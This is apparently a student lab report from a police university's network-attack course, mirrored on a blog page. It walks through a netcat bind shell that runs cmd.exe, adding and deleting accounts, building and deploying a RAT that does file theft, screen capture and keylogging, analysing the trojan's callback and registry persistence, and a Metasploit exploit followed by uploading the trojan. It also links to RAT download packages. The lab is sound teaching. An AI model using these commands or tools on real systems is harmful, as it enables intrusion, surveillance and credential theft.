zoukankan      html  css  js  c++  java
  • 网络对抗技术 实验四 恶意代码技术

    学   号   201821440037

     

    中国人民公安大学

    Chinese people public security university

     

    网络对抗技术

    实验报告

     

    实验四

    恶意代码技术

     

     

     

    学生姓名

    蓝宇轩 

    年级

    2018级 

    区队

     网络安全与执法专业四区队

    指导教师

    高见 

     

     

    信息技术与网络安全学院

    2016117

     

    实验任务总纲

    2020—2021 学年 第  学期

    一、实验目的

    1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

    2.了解并熟悉常用的网络攻击工具,木马的基本功能;

    3.达到巩固课程知识和实际应用的目的。

    二、实验要求

    1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

    2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

    3.软件工具可使用NC、MSF等。

    4.实验结束后,保留电子文档。

    、实验步骤

    1.准备

    提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

    2.实验环境

    描述实验所使用的硬件和软件环境(包括各种软件工具);

    开机并启动软件office2003或2007、浏览器、加解密软件。

    3.实验过程

    1)启动系统和启动工具软件环境。

    2)用软件工具实现实验内容。

    4.实验报告

    按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

    任务一 利用NC控制电脑

     NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

      

    步骤一:

     在受害靶机(虚拟机)上输入下面的命令:

      nc.exe -l -p port -e cmd.exe   进入监听模式

     步骤二:

    在攻击者的机器.(主机)输入下面的命令:

      nc ip  port //连接victim_IP,然后得到一个shell。 (需要截图)

     

    步骤三:

        在shell中,利用net user 用户名 密码 /add ,添加一个用户hacker,并在虚拟机中使用 net user 命令进行验证。(需要截图)

     继续通过命令行输入 net user boss /delete 命令删除

     

     在虚拟机中输入net user命令

     新加用户hacker成功,原有的用户boss不在列表中

    任务二 利用木马控制电脑

    相关工具:

    https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg

    https://pan.baidu.com/s/1ajmRKsnv5XvFrKWzszDYwQ(备用,另外一个木马)

    实验过程需要两个同学配合:

    步骤一:

        攻击者的机器. (同学A)
    打开V2014.exe程序或则star RAT,这两个木马功能类似。

     


    步骤二:
      点击菜单栏中的“创建客户”,在弹出的配置服务端中,配置回上线IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。

     

    步骤三:

    将生成的木马可执行程序拷贝到受害者的机器,并双击运行。 

     

    步骤四:

    在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 【部分功能可能会无效,可以不用截图】

    1.文件管理,尝试拷贝文件

    (1)尝试将虚拟机桌面的密码.txt文件拷贝进主机D盘下的111文件夹

    密码.txt文件内容如下

    (2)拷贝前

    (3)拷贝后

    (4)在主机文件系统中打开拷贝文件

    拷贝成功

    2.屏幕控制,尝试获取桌面

    屏幕控制界面如下

    虚拟机桌面如下: 

     

     屏幕控制成功

    3.键盘记录,尝试获取对方击键记录

    (1)打开键盘记录功能

     

     (2)在虚拟机中输入命令 net user lan lan123 /add,创建一个用户名为lan,密码为lan123的用户

      (3)查看记录结果

    4.会话管理,重启对方机器,查看是否能自启动上线

     重启上线成功

    会话管理,卸载对方的木马。

    任务三 木马分析

    1.将任务二中生成的木马设置具备自删除功能和自启动功能,对其进行分析。回答以下问题(截图证明)

         (推荐使用“火绒剑”工具)

    (1)该木马的回连IP是?

    (2)该木马的回连端口是?

    由下图可知,该木马的回连IP是172.22.232.157,回连端口是2012

    (3)该木马自删除后,会将自身的宿主程序改成什么名字,并隐藏到系统其它目录中。

     

     该木马名称为server,由图可知其自删除后改名为svchosot

    (4)该木马依靠什么方法实现自启动的,怎么实现的。

     

     有图可知,该木马依靠将木马程序写入注册表实现自启动。

     任务四 msf攻击体验

    1.在主机A上搭建easyfile,安装文件为efssetup,请见在线学习平台。

    2.在主机B上安装metasploitframework,并在安装目录中启动/bin下的msfconsole

    3.进入msf命令行后使用search命令查找相关模块,use 加载模块,show options 查看参数。

     4.开始攻击。

    远程目标的80端口不支持easyfile,因此将端口号改为81端口

     远程目标参数rhosts设置为主机A的IP地址,rport参数设置为81,进行攻击。

     5.进入到meterpreter> 命令行下,说明已经获取到shell,可以使用sysinfo查看目标系统的信息,screenshot截屏。

    下面的步骤是进一步控制目标机器,上传木马。

    1.在B机器上搭建ftp,设置用户名和密码。

    2.在B机器开启木马控制端,生成木马server.exe,并放置在ftp目录下。

    3.在meterpreter>命令行下输入shell ,进入被控机器的shell

    4.用被控机器的shell登录B机器的ftp,下载并执行木马。查看木马上线。

     

     因kali上无法登陆ftp,最后选择用upload命令下载木马至靶机c盘

     

  • 相关阅读:
    jython resources
    Installing a Library of Jython ScriptsPart of the WebSphere Application Server v7.x Administration Series Series
    jython好资料
    ulipad install on 64bit win7 has issue
    an oracle article in high level to descibe how to archtichre operator JAVA relevet project
    table的宽度,单元格内换行问题
    Linux常用命令大全
    dedecms系统后台登陆提示用户名密码不存在
    登录织梦后台提示用户名不存在的解决方法介绍
    Shell常用命令整理
  • 原文地址:https://www.cnblogs.com/p201821440037/p/14040248.html
Copyright © 2011-2022 走看看